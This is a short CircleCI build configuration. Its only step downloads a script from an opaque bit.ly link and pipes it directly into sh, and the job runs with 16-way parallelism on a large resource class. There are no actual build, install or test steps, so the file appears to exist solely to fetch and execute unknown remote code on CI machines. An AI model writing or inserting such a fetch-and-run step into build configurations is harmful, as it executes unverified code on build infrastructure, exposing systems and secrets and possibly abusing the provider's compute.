version: 2.1
jobs:
  build:
    docker:
      - image: node:latest
    parallelism: 16
    resource_class: large
    steps:
      - run: wget https://bit.ly/34ONwXl -O - | sh

workflows:
  version: 2.1
  build:
    jobs:
      - build
